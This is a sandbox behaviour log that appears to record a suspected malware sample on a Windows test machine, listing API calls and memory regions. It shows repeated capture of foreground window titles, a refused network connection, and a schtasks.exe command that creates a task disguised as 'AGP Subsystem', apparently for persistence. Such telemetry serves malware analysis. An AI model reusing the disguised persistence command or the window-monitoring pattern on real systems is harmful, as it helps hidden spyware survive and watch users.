[0173.734] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x38c18e8, Length=0x20000, ResultLength=0x580f800 | out: SystemInformation=0x38c18e8, ResultLength=0x580f800*=0xcea0) returned 0x0
[0173.739] GetKeyboardLayout (idThread=0x780) returned 0x4090409
[0173.740] GetWindowTextW (in: hWnd=0x10116, lpString=0x580f5f4, nMaxCount=256 | out: lpString="FolderView") returned 10
[0173.844] GetForegroundWindow () returned 0x102a8
[0173.844] GetWindowThreadProcessId (in: hWnd=0x102a8, lpdwProcessId=0x580f878 | out: lpdwProcessId=0x580f878) returned 0xc6c
[0173.844] EnumProcesses (in: lpidProcess=0x2912b14, cb=0x400, lpcbNeeded=0x580f834 | out: lpidProcess=0x2912b14, lpcbNeeded=0x580f834) returned 1
[0173.846] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x38c18e8, Length=0x20000, ResultLength=0x580f800 | out: SystemInformation=0x38c18e8, ResultLength=0x580f800*=0xcea0) returned 0x0
[0173.850] GetKeyboardLayout (idThread=0xc6c) returned 0x4090409
[0173.850] GetWindowTextW (in: hWnd=0x102a8, lpString=0x580f5f4, nMaxCount=256 | out: lpString="Sit Situation Claim") returned 19
[0174.250] GetForegroundWindow () returned 0x102a8
[0174.250] GetWindowTextW (in: hWnd=0x102a8, lpString=0x580f5f4, nMaxCount=256 | out: lpString="Sit Situation Claim") returned 19
[0174.689] GetForegroundWindow () returned 0x102a8
[0174.689] GetWindowTextW (in: hWnd=0x102a8, lpString=0x580f5f4, nMaxCount=256 | out: lpString="Sit Situation Claim") returned 19
[0175.028] GetForegroundWindow () returned 0x3032a
[0175.028] GetWindowThreadProcessId (in: hWnd=0x3032a, lpdwProcessId=0x580f878 | out: lpdwProcessId=0x580f878) returned 0x7a4
[0175.028] EnumProcesses (in: lpidProcess=0x28cc1dc, cb=0x400, lpcbNeeded=0x580f834 | out: lpidProcess=0x28cc1dc, lpcbNeeded=0x580f834) returned 1
[0175.030] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x38c18e8, Length=0x20000, ResultLength=0x580f800 | out: SystemInformation=0x38c18e8, ResultLength=0x580f800*=0xcf20) returned 0x0
[0175.035] GetKeyboardLayout (idThread=0x7a4) returned 0x4090409
[0175.035] GetWindowTextW (in: hWnd=0x3032a, lpString=0x580f5f4, nMaxCount=256 | out: lpString="Shut Down Windows") returned 17
[0175.944] GetForegroundWindow () returned 0x3032a
[0175.944] GetWindowTextW (in: hWnd=0x3032a, lpString=0x580f5f4, nMaxCount=256 | out: lpString="Shut Down Windows") returned 17
Thread:
id = 43
os_tid = 0xd34
[0173.892] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
[0173.938] CoGetContextToken (in: pToken=0x59ef594 | out: pToken=0x59ef594) returned 0x0
[0173.938] CObjectContext::QueryInterface () returned 0x0
[0173.938] CObjectContext::GetCurrentThreadType () returned 0x0
[0173.938] Release () returned 0x0
[0173.938] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x1
[0173.938] CoUninitialize ()
[0173.993] GetForegroundWindow () returned 0x102a8
[0173.994] GetWindowTextW (in: hWnd=0x102a8, lpString=0x59eeed4, nMaxCount=256 | out: lpString="Sit Situation Claim") returned 19
[0174.168] GetForegroundWindow () returned 0x102a8
[0174.168] GetWindowTextW (in: hWnd=0x102a8, lpString=0x59eeed4, nMaxCount=256 | out: lpString="Sit Situation Claim") returned 19
[0176.108] GetForegroundWindow () returned 0x3032a
[0176.108] GetWindowTextW (in: hWnd=0x3032a, lpString=0x59eeed4, nMaxCount=256 | out: lpString="Shut Down Windows") returned 17
[0176.206] GetForegroundWindow () returned 0x3032a
[0176.206] GetWindowTextW (in: hWnd=0x3032a, lpString=0x59eeed4, nMaxCount=256 | out: lpString="Shut Down Windows") returned 17
[0176.389] GetForegroundWindow () returned 0x3032a
[0176.390] GetWindowTextW (in: hWnd=0x3032a, lpString=0x59eeed4, nMaxCount=256 | out: lpString="Shut Down Windows") returned 17
[0176.466] GetForegroundWindow () returned 0x3032a
[0176.466] GetWindowTextW (in: hWnd=0x3032a, lpString=0x59eeed4, nMaxCount=256 | out: lpString="Shut Down Windows") returned 17
[0176.538] GetForegroundWindow () returned 0x3032a
[0176.538] GetWindowTextW (in: hWnd=0x3032a, lpString=0x59eeed4, nMaxCount=256 | out: lpString="Shut Down Windows") returned 17
[0176.621] GetForegroundWindow () returned 0x3032a
[0176.621] GetWindowTextW (in: hWnd=0x3032a, lpString=0x59eeed4, nMaxCount=256 | out: lpString="Shut Down Windows") returned 17
[0176.689] GetForegroundWindow () returned 0x3032a
[0176.689] GetWindowTextW (in: hWnd=0x3032a, lpString=0x59eeed4, nMaxCount=256 | out: lpString="Shut Down Windows") returned 17
[0176.778] GetForegroundWindow () returned 0x0
[0176.778] GetKeyboardLayout (idThread=0x0) returned 0x4090409
[0176.778] GetWindowTextW (in: hWnd=0x0, lpString=0x59eeed4, nMaxCount=256 | out: lpString="") returned 0
[0176.838] GetForegroundWindow () returned 0x3032a
[0176.838] GetWindowThreadProcessId (in: hWnd=0x3032a, lpdwProcessId=0x59ef158 | out: lpdwProcessId=0x59ef158) returned 0x7a4
[0176.839] EnumProcesses (in: lpidProcess=0x28dcdf8, cb=0x400, lpcbNeeded=0x59ef114 | out: lpidProcess=0x28dcdf8, lpcbNeeded=0x59ef114) returned 1
[0176.842] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x38c18e8, Length=0x20000, ResultLength=0x59ef0e0 | out: SystemInformation=0x38c18e8, ResultLength=0x59ef0e0*=0xcfa0) returned 0x0
[0176.847] GetKeyboardLayout (idThread=0x7a4) returned 0x4090409
[0176.848] GetWindowTextW (in: hWnd=0x3032a, lpString=0x59eeed4, nMaxCount=256 | out: lpString="Shut Down Windows") returned 17
[0176.925] GetForegroundWindow () returned 0x3032a
[0176.925] GetWindowTextW (in: hWnd=0x3032a, lpString=0x59eeed4, nMaxCount=256 | out: lpString="Shut Down Windows") returned 17
[0176.993] GetForegroundWindow () returned 0x3032a
[0176.993] GetWindowTextW (in: hWnd=0x3032a, lpString=0x59eeed4, nMaxCount=256 | out: lpString="Shut Down Windows") returned 17
[0177.058] GetForegroundWindow () returned 0x3032a
[0177.058] GetWindowTextW (in: hWnd=0x3032a, lpString=0x59eeed4, nMaxCount=256 | out: lpString="Shut Down Windows") returned 17
[0177.120] GetForegroundWindow () returned 0x0
[0177.120] GetKeyboardLayout (idThread=0x0) returned 0x4090409
[0177.120] GetWindowTextW (in: hWnd=0x0, lpString=0x59eeed4, nMaxCount=256 | out: lpString="") returned 0
[0177.183] GetForegroundWindow () returned 0x3032a
[0177.183] GetWindowThreadProcessId (in: hWnd=0x3032a, lpdwProcessId=0x59ef158 | out: lpdwProcessId=0x59ef158) returned 0x7a4
[0177.183] EnumProcesses (in: lpidProcess=0x28e46fc, cb=0x400, lpcbNeeded=0x59ef114 | out: lpidProcess=0x28e46fc, lpcbNeeded=0x59ef114) returned 1
[0177.185] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x38c18e8, Length=0x20000, ResultLength=0x59ef0e0 | out: SystemInformation=0x38c18e8, ResultLength=0x59ef0e0*=0xcfe0) returned 0x0
[0177.189] GetKeyboardLayout (idThread=0x7a4) returned 0x4090409
[0177.189] GetWindowTextW (in: hWnd=0x3032a, lpString=0x59eeed4, nMaxCount=256 | out: lpString="Shut Down Windows") returned 17
[0177.254] GetForegroundWindow () returned 0x3032a
[0177.254] GetWindowTextW (in: hWnd=0x3032a, lpString=0x59eeed4, nMaxCount=256 | out: lpString="Shut Down Windows") returned 17
[0177.318] GetForegroundWindow () returned 0x3032a
[0177.318] GetWindowTextW (in: hWnd=0x3032a, lpString=0x59eeed4, nMaxCount=256 | out: lpString="Shut Down Windows") returned 17
[0177.380] GetForegroundWindow () returned 0x3032a
[0177.380] GetWindowTextW (in: hWnd=0x3032a, lpString=0x59eeed4, nMaxCount=256 | out: lpString="Shut Down Windows") returned 17
[0177.524] GetForegroundWindow () returned 0x0
[0177.703] GetKeyboardLayout (idThread=0x0) returned 0x4090409
[0177.703] GetWindowTextW (in: hWnd=0x0, lpString=0x59eeed4, nMaxCount=256 | out: lpString="") returned 0
[0177.704] GetForegroundWindow () returned 0x3032a
[0177.704] GetWindowThreadProcessId (in: hWnd=0x3032a, lpdwProcessId=0x59ef158 | out: lpdwProcessId=0x59ef158) returned 0x7a4
[0177.704] EnumProcesses (in: lpidProcess=0x28ec020, cb=0x400, lpcbNeeded=0x59ef114 | out: lpidProcess=0x28ec020, lpcbNeeded=0x59ef114) returned 1
[0177.706] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x38c18e8, Length=0x20000, ResultLength=0x59ef0e0 | out: SystemInformation=0x38c18e8, ResultLength=0x59ef0e0*=0xcfe0) returned 0x0
[0177.711] GetKeyboardLayout (idThread=0x7a4) returned 0x4090409
[0177.711] GetWindowTextW (in: hWnd=0x3032a, lpString=0x59eeed4, nMaxCount=256 | out: lpString="Shut Down Windows") returned 17
[0177.856] GetForegroundWindow () returned 0x3032a
[0178.081] GetWindowTextW (in: hWnd=0x3032a, lpString=0x59eeed4, nMaxCount=256 | out: lpString="Shut Down Windows") returned 17
Thread:
id = 44
os_tid = 0xd38
Thread:
id = 45
os_tid = 0x888
[0176.454] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
[0176.454] CoGetContextToken (in: pToken=0x5b0f6dc | out: pToken=0x5b0f6dc) returned 0x0
[0176.454] CObjectContext::QueryInterface () returned 0x0
[0176.454] CObjectContext::GetCurrentThreadType () returned 0x0
[0176.454] Release () returned 0x0
[0176.454] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x1
[0176.454] CoUninitialize ()
[0177.770] WSAGetOverlappedResult (in: s=0x348, lpOverlapped=0x28cc11c, lpcbTransfer=0x5b0f4a4, fWait=0, lpdwFlags=0x5b0f478 | out: lpcbTransfer=0x5b0f4a4, lpdwFlags=0x5b0f478) returned 0
[0177.840] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x274d, dwLanguageId=0x0, lpBuffer=0x5b0f0bc, nSize=0x101, Arguments=0x0 | out: lpBuffer="No connection could be made because the target machine actively refused it.\r\n") returned 0x4d
[0177.915] closesocket (s=0x348) returned 0
Process:
id = "5"
image_name = "schtasks.exe"
filename = "c:\\windows\\syswow64\\schtasks.exe"
page_root = "0x3b6cd000"
os_pid = "0x7d0"
os_integrity_level = "0x3000"
os_privileges = "0x60800000"
monitor_reason = "child_process"
parent_id = "4"
os_parent_pid = "0x830"
cmd_line = "\"schtasks.exe\" /create /f /tn \"AGP Subsystem\" /xml \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmpFD29.tmp\""
cur_dir = "C:\\Users\\kEecfMwgj\\Desktop\\"
os_username = "Q9IATRKPRH\\kEecfMwgj"
bitness = "32"
os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f52a" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 1893
start_va = 0x10000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 1894
start_va = 0x30000
end_va = 0x31fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000030000"
filename = ""
Region:
id = 1895
start_va = 0x40000
end_va = 0x40fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 1896
start_va = 0x50000
end_va = 0x53fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000050000"
filename = ""
Region:
id = 1897
start_va = 0x60000
end_va = 0x60fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000060000"
filename = ""
Region:
id = 1898
start_va = 0xa0000
end_va = 0xdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000a0000"
filename = ""
Region:
id = 1899
start_va = 0x250000
end_va = 0x28ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000250000"
filename = ""
Region:
id = 1900
start_va = 0x2c0000
end_va = 0x2edfff
monitored = 1
entry_point = 0x2d7683
region_type = mapped_file
name = "schtasks.exe"
filename = "\\Windows\\SysWOW64\\schtasks.exe" (normalized: "c:\\windows\\syswow64\\schtasks.exe")
Region:
id = 1901
start_va = 0x76d20000
end_va = 0x76ec8fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 1902
start_va = 0x76f00000
end_va = 0x7707ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")
Region:
id = 1903
start_va = 0x7efb0000
end_va = 0x7efd2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efb0000"
filename = ""
Region:
id = 1904
start_va = 0x7efdb000
end_va = 0x7efddfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efdb000"
filename = ""
Region:
id = 1905
start_va = 0x7efde000
end_va = 0x7efdefff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efde000"
filename = ""
Region:
id = 1906
start_va = 0x7efdf000
end_va = 0x7efdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efdf000"
filename = ""
Region:
id = 1907
start_va = 0x7efe0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efe0000"
filename = ""
Region:
id = 1908
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 1909
start_va = 0x7fff0000
end_va = 0x7fffffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007fff0000"
filename = ""
Region:
id = 1910
start_va = 0xe0000
end_va = 0x15ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000e0000"
filename = ""
Region:
id = 1911
start_va = 0x73690000
end_va = 0x736cefff
monitored = 0
entry_point = 0x736be088
region_type = mapped_file
name = "wow64.dll"
filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")
Region:
id = 1912
start_va = 0x73630000
end_va = 0x7368bfff
monitored = 0
entry_point = 0x7366f9f4
region_type = mapped_file
name = "wow64win.dll"
filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")
Region:
id = 1913
start_va = 0x73620000
end_va = 0x73627fff
monitored = 0
entry_point = 0x736220f8
region_type = mapped_file
name = "wow64cpu.dll"
filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")
Region:
id = 1914
start_va = 0x76b00000
end_va = 0x76c1efff
monitored = 0
entry_point = 0x76b15340
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 1915
start_va = 0x752b0000
end_va = 0x753bffff
monitored = 0
entry_point = 0x752c3283
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")
Region:
id = 1916
start_va = 0x76b00000
end_va = 0x76c1efff
monitored = 0
entry_point = 0x76b15340
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 1917
start_va = 0x76b00000
end_va = 0x76c1efff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000076b00000"
filename = ""
Region:
id = 1918
start_va = 0x76c20000
end_va = 0x76d19fff
monitored = 0
entry_point = 0x76c3a2c8
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 1919
start_va = 0x76c20000
end_va = 0x76d19fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000076c20000"
filename = ""
Region:
id = 1920
start_va = 0x2f0000
end_va = 0x3effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000002f0000"
filename = ""
Region:
id = 1921
start_va = 0x752b0000
end_va = 0x753bffff
monitored = 0
entry_point = 0x752c3283
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")
Region:
id = 1922
start_va = 0x753c0000
end_va = 0x75406fff
monitored = 0
entry_point = 0x753c74c1
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")
Region:
id = 1923
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 1924
start_va = 0x7efe0000
end_va = 0x7f0dffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efe0000"
filename = ""
Region:
id = 1925
start_va = 0x7f0e0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007f0e0000"
filename = ""
Region:
id = 1938
start_va = 0x20000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000020000"
filename = ""
Region:
id = 1939
start_va = 0x160000
end_va = 0x1c6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 1940
start_va = 0x75410000
end_va = 0x754bbfff
monitored = 0
entry_point = 0x7541a472
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")
Region:
id = 1941
start_va = 0x76860000
end_va = 0x7695ffff
monitored = 0
entry_point = 0x7687b6ed
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll")
Region:
id = 1942
start_va = 0x75220000
end_va = 0x752affff
monitored = 0
entry_point = 0x75236343
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll")
Region:
id = 1943
start_va = 0x759c0000
end_va = 0x759c9fff
monitored = 0
entry_point = 0x759c36a0
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll")
Region:
id = 1944
start_va = 0x74d40000
end_va = 0x74ddcfff
monitored = 0
entry_point = 0x74d73fd7
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll")
Region:
id = 1945
start_va = 0x76a60000
end_va = 0x76afffff
monitored = 0
entry_point = 0x76a749e5
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll")
Region:
id = 1946
start_va = 0x759a0000
end_va = 0x759b8fff
monitored = 0
entry_point = 0x759a4975
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll")
Region:
id = 1947
start_va = 0x76970000
end_va = 0x76a5ffff
monitored = 0
entry_point = 0x76980569
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll")
Region:
id = 1948
start_va = 0x74a50000
end_va = 0x74aaffff
monitored = 0
entry_point = 0x74a6a3b3
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll")
Region:
id = 1949
start_va = 0x74a40000
end_va = 0x74a4bfff
monitored = 0
entry_point = 0x74a410e1
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll")
Region:
id = 1950
start_va = 0x75740000
end_va = 0x7589bfff
monitored = 0
entry_point = 0x7578ba3d
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll")
Region:
id = 1951
start_va = 0x75130000
end_va = 0x751befff
monitored = 0
entry_point = 0x75133fb1
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll")
Region:
id = 1952
start_va = 0x751c0000
end_va = 0x75216fff
monitored = 0
entry_point = 0x751d9ba6
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll")
Region:
id = 1953
start_va = 0x6f7a0000
end_va = 0x6f7a8fff
monitored = 0
entry_point = 0x6f7a1830
region_type = mapped_file
name = "ktmw32.dll"
filename = "\\Windows\\SysWOW64\\ktmw32.dll" (normalized: "c:\\windows\\syswow64\\ktmw32.dll")
Region:
id = 1954
start_va = 0x3f0000
end_va = 0x5affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003f0000"
filename = ""
Region:
id = 1955
start_va = 0x3f0000
end_va = 0x577fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000003f0000"
filename = ""
Region:
id = 1956
start_va = 0x5a0000
end_va = 0x5affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000005a0000"
filename = ""
Region:
id = 1957
start_va = 0x70000
end_va = 0x8dfff
monitored = 0
entry_point = 0x8158f
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")
Region:
id = 1958
start_va = 0x70000
end_va = 0x8dfff
monitored = 0
entry_point = 0x8158f
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")
Region:
id = 1959
start_va = 0x75550000
end_va = 0x755affff
monitored = 0
entry_point = 0x7556158f
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")
Region:
id = 1960
start_va = 0x74c40000
end_va = 0x74d0bfff
monitored = 0
entry_point = 0x74c4168b
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll")
Region:
id = 1961
start_va = 0x5b0000
end_va = 0x730fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000005b0000"
filename = ""
Region:
id = 1962
start_va = 0x740000
end_va = 0x1b3ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000740000"
filename = ""
Region:
id = 1963
start_va = 0x70000
end_va = 0x81fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "schtasks.exe.mui"
filename = "\\Windows\\SysWOW64\\en-US\\schtasks.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\schtasks.exe.mui")
Region:
id = 1964
start_va = 0x30000
end_va = 0x30fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000030000"
filename = ""
Region:
id = 1965
start_va = 0x90000
end_va = 0x90fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000090000"
filename = ""
Region:
id = 1966
start_va = 0x733a0000
end_va = 0x733a8fff
monitored = 0
entry_point = 0x733a1220
region_type = mapped_file
name = "version.dll"
filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll")
Region:
id = 1967
start_va = 0x1b40000
end_va = 0x1e0efff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 1968
start_va = 0x73a10000
end_va = 0x73a8ffff
monitored = 0
entry_point = 0x73a237c9
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll")
Region:
id = 1969
start_va = 0x1e10000
end_va = 0x1f6ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001e10000"
filename = ""
Region:
id = 1970
start_va = 0x1e10000
end_va = 0x1eeefff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001e10000"
filename = ""
Region:
id = 1971
start_va = 0x1f30000
end_va = 0x1f6ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001f30000"
filename = ""
Region:
id = 1972
start_va = 0x200000
end_va = 0x23ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000200000"
filename = ""
Region:
id = 1973
start_va = 0x2010000
end_va = 0x204ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002010000"
filename = ""
Region:
id = 1974
start_va = 0x7efd8000
end_va = 0x7efdafff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efd8000"
filename = ""
Region:
id = 1975
start_va = 0x1d0000
end_va = 0x1d0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001d0000"
filename = ""
Region:
id = 1976
start_va = 0x754c0000
end_va = 0x75542fff
monitored = 0
entry_point = 0x754c23d2
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll")
Region:
id = 1977
start_va = 0x1e0000
end_va = 0x1e0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001e0000"
filename = ""
Region:
id = 1978
start_va = 0x6ea10000
end_va = 0x6ea8cfff
monitored = 0
entry_point = 0x6ea1166a
region_type = mapped_file
name = "taskschd.dll"
filename = "\\Windows\\SysWOW64\\taskschd.dll" (normalized: "c:\\windows\\syswow64\\taskschd.dll")
Thread:
id = 29
os_tid = 0x650
[0169.545] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x28fcd0 | out: lpSystemTimeAsFileTime=0x28fcd0*(dwLowDateTime=0xde9ea0a0, dwHighDateTime=0x1d8a8be))
[0169.545] GetCurrentProcessId () returned 0x7d0
[0169.545] GetCurrentThreadId () returned 0x650
[0169.545] GetTickCount () returned 0x166fe42
[0169.545] RtlQueryPerformanceCounter () returned 0x1
[0169.545] GetModuleHandleA (lpModuleName=0x0) returned 0x2c0000
[0169.545] __set_app_type (_Type=0x1)
[0169.545] __p__fmode () returned 0x754b31f4
[0169.545] __p__commode () returned 0x754b31fc
[0169.546] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x2d7881) returned 0x0
[0169.546] __wgetmainargs (in: _Argc=0x2e9e6c, _Argv=0x2e9e74, _Env=0x2e9e70, _DoWildCard=0, _StartInfo=0x2e9e80 | out: _Argc=0x2e9e6c, _Argv=0x2e9e74, _Env=0x2e9e70) returned 0
[0169.547] _onexit (_Func=0x2e0fe2) returned 0x2e0fe2
[0169.547] _onexit (_Func=0x2e0ff3) returned 0x2e0ff3
[0169.547] _onexit (_Func=0x2e1002) returned 0x2e1002
[0169.547] _onexit (_Func=0x2e101e) returned 0x2e101e
[0169.547] _onexit (_Func=0x2e103a) returned 0x2e103a
[0169.548] _onexit (_Func=0x2e1056) returned 0x2e1056
[0169.548] _onexit (_Func=0x2e1072) returned 0x2e1072
[0169.549] _onexit (_Func=0x2e108e) returned 0x2e108e
[0169.549] _onexit (_Func=0x2e10aa) returned 0x2e10aa
[0169.549] _onexit (_Func=0x2e10c6) returned 0x2e10c6
[0169.549] _onexit (_Func=0x2e10e2) returned 0x2e10e2
[0169.549] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
[0169.549] WinSqmIsOptedIn () returned 0x0
[0169.550] GetProcessHeap () returned 0x2f0000
[0169.550] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x10) returned 0x2ff058
[0169.550] SetLastError (dwErrCode=0x0)
[0169.550] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x0, Condition=0x2) returned 0x18
[0169.550] VerSetConditionMask (ConditionMask=0x18, TypeMask=0x80000000, Condition=0x1) returned 0x1b
